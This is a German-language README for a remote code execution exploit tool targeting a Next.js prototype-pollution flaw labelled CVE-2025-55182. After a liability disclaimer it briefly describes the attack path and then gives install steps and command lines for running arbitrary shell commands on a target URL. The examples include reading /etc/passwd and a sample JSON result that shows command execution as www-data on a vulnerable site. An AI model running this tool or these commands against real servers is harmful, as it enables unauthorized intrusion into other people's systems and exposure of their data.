
CVE-2025-55182 Next.js RCE-Exploit-Tool
Chinesische Dokumentation | Analyse der Schwachstelle
[!CAUTION]
⚠️ HAFTUNGSAUSSCHLUSS - VOR VERWENDUNG LESEN
Dieses Tool ist NUR bestimmt für:
- Sicherheitsforscher, die Schwachstellenüberprüfungen durchführen
- Autorisierte Penetrationstests mit ausdrücklicher Genehmigung
- Bildungs- und Lernzwecke
Unbefugter Zugriff auf Computersysteme ist ILLEGAL.
Durch die Nutzung dieses Tools stimmen Sie zu, dass:
- Sie eine ordnungsgemäße Genehmigung eingeholt haben, bevor Sie ein System testen
- Sie dieses Tool nicht für böswillige Zwecke verwenden werden
- Sie allein für Ihre Handlungen und alle Konsequenzen verantwortlich sind
Der Autor übernimmt KEINE Haftung für Missbrauch dieses Tools.
Ein Remote Code Execution (RCE) Exploit-Tool für die Next.js serverseitige Prototype-Pollution-Schwachstelle.
CVE-2025-55182 ist eine kritische Sicherheitslücke, die Next.js betrifft und es Angreifern ermöglicht, durch manipulierte Anfragen, die Prototype Pollution ausnutzen, Remote Code Execution zu erreichen.
📖 Für eine detaillierte technische Analyse siehe EXPLOIT.md
Diese Schwachstelle nutzt den Anforderungsbearbeitungsmechanismus von Next.js Server Actions aus und erreicht durch __proto__-Prototype-Chain-Pollution in Verbindung mit dem Function-Konstruktor die Ausführung beliebigen Codes.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Usage:
cve-2025-55182 <url> [command]
Arguments:
url Target URL (required)
command Command to execute (default: whoami)
Options:
-h, --help Show help message
-v, --version Show version number
Das Tool gibt Ergebnisse im JSON-Format aus:
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}